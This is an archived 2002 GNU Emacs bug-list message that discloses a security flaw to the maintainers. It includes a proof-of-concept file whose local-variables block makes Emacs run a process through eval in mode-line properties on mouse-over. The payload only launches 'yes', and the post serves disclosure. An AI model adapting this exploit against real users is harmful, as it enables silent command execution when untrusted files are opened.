bug-gnu-emacs
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: security problem in emacs

From: Georgi Guninski
Subject: Re: security problem in emacs
Date: Tue, 31 Dec 2002 16:47:21 +0200
User-agent: Mozilla/5.0 (X11; Linux) 
Kai Gro?johann wrote:


Georgi Guninski  writes:


>Attached file demonstrates GNU Emacs 21.2.1 starting process if a text
>file is opened. Just open it with emacs and check for processes "yes".


This has been fixed in the development sources.  The user is asked
whether to execute the Lisp code.

Alas, this has not been fixed in the 21.3 pretest.



Is the new attached file also fixed?
It requires mouse over text.
I suggest you disable local variables by default - they are not portable and some people use emacs for examining untrusted log files or read mail. 


georgi




/* -*- Mode: text; tab-width:20; Eval: Mode  -*- -*- forms -*- */

Emacs better than windoze.
Mouse over the modeline, then check for started yes.
 
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("MOUSE OVER ME   " 0 10 
                     (local-map
                      (keymap
                       (header-line (eval (start-process "/usr/bin/yes"
"/usr/bin/yes" "/usr/bin/yes")) 
                                    (down-mouse-3 . mode-line-mode-menu-1))
                       (mode-line keymap
                                  (down-mouse-3 . mode-line-mode-menu-1)))
                      help-echo (eval (start-process "/usr/bin/yes"
"/usr/bin/yes" "/usr/bin/yes")) ) 
 ) ***
;;; comment-start: ";;; "  ***
;;; comment-end:"***" ***
;;; End: ***
reply via email to
[Prev in Thread] Current Thread [Next in Thread]